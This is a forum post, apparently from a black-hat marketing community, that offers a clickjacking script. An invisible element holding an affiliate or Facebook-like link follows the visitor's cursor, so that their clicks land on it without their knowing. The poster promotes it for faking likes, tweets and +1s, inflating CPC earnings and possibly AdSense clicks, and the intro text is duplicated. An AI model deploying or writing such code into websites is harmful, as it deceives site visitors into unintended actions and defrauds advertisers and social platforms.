Hi! It is my first post on this forum, I would like to share with U a very clever simple script.
Collect fb "likes" tweets, google "+" never be easly!
ofcourse U can use that for improve your CPC or smth.
There is:
Enjoy!
Ps. That script will works with adsense too, but i higly dont recommend that!
Give me reputation + if that script help U. Thx
Collect fb "likes" tweets, google "+" never be easly!
ofcourse U can use that for improve your CPC or smth.
There is:
HTML:
<body style="background: url("images/bg_body.gif") repeat-x scroll 0% 0% rgb(49, 92, 131);">
<center>
<div style="width: 942px; margin-top: 1em; padding-top: 1em; padding-bottom: 1em; background-color: white;">
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; opacity: 0; top: 286px; left: 509px;" id="icontainer">
<a href="hXXp://yourBHWaffilateCPCorFBlikeSCRIPTlink.html"><img src="fakebackground.png" alt="sdf" title="sdf" /></a>
</div>
<script>
var iflag = 0;
var icontainer = document.getElementById('icontainer');
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body
function mouseFollower(e){
if (window.event)
{
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
}
else
{
icontainer.style.top = (e.pageY-5)+'px';
icontainer.style.left = (e.pageX-5)+'px';
}
}
document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}
}
</script></div></center></body>
Ps. That script will works with adsense too, but i higly dont recommend that!
Give me reputation + if that script help U. Thx